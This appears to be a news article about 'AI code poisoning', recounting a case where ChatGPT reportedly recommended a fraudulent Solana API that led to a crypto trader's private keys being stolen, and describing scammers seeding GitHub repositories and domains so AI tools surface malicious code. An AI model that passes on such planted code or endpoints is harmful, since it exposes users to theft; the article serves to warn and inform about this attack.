AI Code Poisoning: A Growing Threat in the Tech World
Yu Xian, the founder of Slowmist, a blockchain security firm, recently raised concerns about a new and rising threat known as AI code poisoning. This attack involves injecting harmful code into the training data of AI models, posing serious risks for users who rely on these tools for technical tasks.
The Troubling Incident
The issue came to light after a concerning incident involving OpenAI’s ChatGPT. In a recent case, a crypto trader named “r_cky0” reported losing $2,500 in digital assets after seeking ChatGPT’s assistance in creating a bot for a Solana-based memecoin generator called Pump.fun.
Unfortunately, the chatbot recommended a fraudulent Solana API website, leading to the theft of the user’s private keys. Within just 30 minutes of using the malicious API, all assets were drained to a wallet associated with the scam.
Further investigation revealed that the address receiving stolen tokens was linked to a known fraudster, raising suspicions of premeditation. The fraudulent API’s domain name was registered two months prior, and the website lacked substantial content, containing only documents and code repositories.
Although the poisoning seems intentional, there is no evidence to suggest that OpenAI purposely integrated malicious data into ChatGPT’s training. The issue likely stemmed from SearchGPT.
Implications of AI Code Poisoning
Scam Sniffer, a blockchain security firm, highlighted how scammers are polluting AI training data with harmful crypto code. Notably, a GitHub user named “solanaapisdev” has been creating repositories to manipulate AI models for generating fraudulent outputs in recent months.
As AI tools like ChatGPT become increasingly popular, they face growing challenges from attackers seeking new ways to exploit them. Xian warned crypto users about the dangers associated with large language models (LLMs) like GPT, emphasizing the real threat of AI poisoning. Without stronger defenses, incidents like these could erode trust in AI-driven tools and expose users to significant financial losses.